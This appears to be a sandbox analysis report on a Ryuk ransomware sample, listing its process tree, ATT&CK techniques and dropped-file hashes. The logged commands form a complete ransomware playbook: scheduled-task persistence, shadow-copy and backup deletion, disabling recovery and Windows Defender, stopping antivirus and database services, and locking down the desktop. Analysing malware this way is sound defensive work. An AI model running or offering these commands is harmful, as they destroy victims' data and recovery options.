4736 attrib.exe
720 attrib.exe

pid	process
4524	attrib.exe
4008	attrib.exe
3484	attrib.exe
4736	attrib.exe
720	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:4156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:2308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:3024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:4008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:3976

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:3776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F
3⤵
- Creates scheduled task(s)
PID:224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\SysWOW64\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:3484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:4736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:4420

C:\Windows\SysWOW64\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:1732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:4212

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:872

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:4576

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:4920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4572

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:2760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:2092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
- Checks computer location settings
- Modifies registry class
PID:2076

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:1424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:3664

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:4116

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:4252

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:3392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:2680

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:3144

C:\Windows\SysWOW64\net.exe
net stop avpsus /y
3⤵
PID:2128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:3188

C:\Windows\SysWOW64\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:3976

C:\Windows\SysWOW64\net.exe
net stop mfewc /y
3⤵
PID:2708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:3836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:4052

C:\Windows\SysWOW64\net.exe
net stop BMR Boot Service /y
3⤵
PID:2476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:5068

C:\Windows\SysWOW64\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:4076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:1724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:3212

C:\Windows\SysWOW64\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1880

C:\Windows\SysWOW64\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:3852

C:\Windows\SysWOW64\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:2736

C:\Windows\SysWOW64\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:3888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:4564

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:4320

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:3980

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:2700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:4064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:1348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:4264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:4624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:3496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:2052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:5048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:3380

C:\Windows\SysWOW64\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:4768

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:3520

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:5028

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:1928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:972

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:2732

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:3024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1364

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:4700

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:864

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:4252

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:2168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:3800

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:3588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:1768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:3320

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:4920

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:3924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:3860

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:3144

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:3804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:4332

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:4896

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe
Filesize
767KB

MD5
d2e194259106bca3b42dc8690d340b59

SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b

SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

Download Submit
C:\ProgramData\RYUKID
Filesize
8B

MD5
2e57aabba468aa3790686fa1def14a85

SHA1
5c3decfd2de0f04ccd552403344c854bcefb4b4a

SHA256
c3c894e3a67f0e834dd44772004e00af307002d450f78ee14f520d4682e6e4c3

SHA512
c15193315bdf008c95f85e0417c107a7d7dfea60d903db7afcccfcf6201e17c758dc81f1d69a370d0f76c1cbc64bc1a22ea355171861b09ed9fd2e3a1f67871e

Download Submit
C:\ProgramData\RyukReadMe.html
Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\RyukReadMe.html.[Vulcanteam@CYBERFEAR.COM].RYK
Filesize
858B

MD5
97d0d0e049f0a0d510b9a29cdedc4f96

